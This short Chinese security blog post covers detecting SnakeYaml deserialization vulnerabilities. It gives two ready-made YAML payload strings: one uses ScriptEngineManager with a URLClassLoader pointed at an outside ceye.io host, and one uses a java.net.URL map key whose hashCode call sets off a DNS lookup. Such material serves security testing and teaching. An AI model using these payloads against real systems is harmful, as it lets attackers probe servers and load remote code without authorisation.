正文

SnakeYaml从漏洞探测到利用姿势

admin
admin V管理员 /0 评论 /310 阅读
0110
此篇文章发布距今已超过669天,您需要注意文章的内容或图片是否可用!

反序列化探测

使用URLClassLoader探测

String poc = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://tcbua9.ceye.io/\"]]]]";

使用Key调用hashCode方法探测

外部探测漏洞点

String poc = "{!!java.net.URL [\"http://tcbua9.ceye.io/\"]: 1}";

我们根据urldns链可以知道key会进行hashCode方法的调用,之后进行urldns的解析

SnakeYaml在进行map的处理的时候将会对key进行hashCode处理,所以我们尝试map的格式

HashMap hashMap = new HashMap();
    hashMap.put("a", "a");
    hashMap.put("b", "b");
    System.out.println(yaml.dump(hashMap));
// {a: a, b: b}

所以我们就可以按照这种使用{ }包裹的形式构造map,然后将指定的URL置于key位置


ZhouSa.com-周飒博客